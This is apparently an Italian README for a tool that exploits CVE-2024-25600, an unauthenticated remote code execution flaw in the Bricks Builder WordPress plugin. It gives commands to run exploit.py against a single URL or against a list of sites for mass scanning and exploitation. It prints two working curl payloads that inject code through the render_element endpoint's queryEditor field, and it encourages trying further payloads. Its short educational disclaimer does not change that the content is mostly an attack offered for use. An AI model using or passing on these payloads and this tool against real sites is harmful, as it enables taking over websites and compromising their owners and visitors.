
Questo strumento è progettato per sfruttare la vulnerabilità CVE-2024-25600 presente nel plugin Bricks Builder per WordPress. La vulnerabilità consente l'esecuzione remota di codice non autenticata sui siti web interessati. Lo strumento automatizza il processo di sfruttamento recuperando i nonce e inviando richieste appositamente create per eseguire comandi arbitrari.
Questo strumento 🛠️ è progettato per sfruttare la vulnerabilità CVE-2024-25600 🕳️ trovata nel plugin Bricks Builder per WordPress. La vulnerabilità consente l'esecuzione remota di codice non autenticata sui siti web interessati 💻. Lo strumento automatizza il processo di sfruttamento recuperando i nonce e inviando richieste appositamente create per eseguire comandi arbitrari.
git clone.pip install -r requirements.txt.python exploit.py -u <URL> per avviare la modalità interattiva.python exploit.py -l <percorso_file> per scansionare e sfruttare i siti elencati.Il PoC di base fornito dalla divulgazione è il seguente:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Aggiornamento: Secondo PoC (più affidabile)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
È possibile che payload aggiuntivi producano risultati migliori. Se il mio exploit o la dimostrazione di concetto non funzionano per te, ti incoraggio a sperimentare con payload alternativi per trovare una soluzione più efficace.
Sostituisci [HOST] con il sito target e [NONCE] con il valore nonce recuperato dal sito.
Per maggiori informazioni sulla vulnerabilità CVE-2024-25600, consulta la divulgazione dettagliata su Snicco.io.
Le informazioni fornite in questo README sono solo a scopo educativo. L'accesso non autorizzato a siti web o reti è illegale e non etico. 🚫
Riconoscimenti ai ricercatori di sicurezza che hanno scoperto e segnalato questa vulnerabilità, fornendo alla comunità informazioni e strumenti per aiutare a proteggere le loro applicazioni web.